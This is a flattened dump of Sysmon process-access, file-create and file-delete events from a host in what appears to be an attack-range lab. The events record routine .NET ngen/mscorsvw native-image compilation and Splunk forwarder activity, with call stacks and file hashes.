21:04:26.556{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:26.447{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.431{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:26.415{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:26.321{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15e0-0\Microsoft.Transactions.Bridge.dll2021-06-23 21:04:26.321 23542300x800000000000000020788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.134{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT 
AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=46FA1A6785772762AF52E677174E176C,SHA256=1542F9D33514F41CB767B78CB407C16D62F93AE97BF8D1F05DDB2C73974027F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCDA3670D8B112863E996B3E772B3FF,SHA256=0E1128FB84D58C9EB8324796ED487F45A77D7243E460FF4825A4883FF9FE16F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.915{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.899{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.899{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
11241100x800000000000000020813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:27.821{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1990-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-06-23 21:04:27.821 23542300x800000000000000020812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.806{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8811025D191182E95626003990DAD6,SHA256=897CF2DF1171C0BF8EAB6DD65D57D54501A5A1E74B617FD39BD707F78DE9757B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.478{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.463{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.463{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.290{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.274{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.274{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:27.243{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8b4-0\Microsoft.UpdateServices.SMPlugin.dll2021-06-23 21:04:27.228 23542300x800000000000000020804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.118{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B50401B0B6C7550890626C7FB0CE6FC4,SHA256=1E4B92DD733C3F8684A035E458D0C275627FCAEFEAB626C5249FD169ED29E1F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.071{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.024{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:27.024{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.916{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=050D24C04FE7B4BA77804ED3CE8287CE,SHA256=713B98D71573946980D2D69D226FFDB6E3B3C522A25BDB3F01D09208EB2E671F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:28.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:28.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.134{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAA2B8405185CD218A9A5D359CED0744,SHA256=A6CAF74A38C33DD1CFCF69BEFE1B52006D6AF621808305D2C420612687EB8C0C,IMPHASH=00000000000000000000000000000000falsetrue 
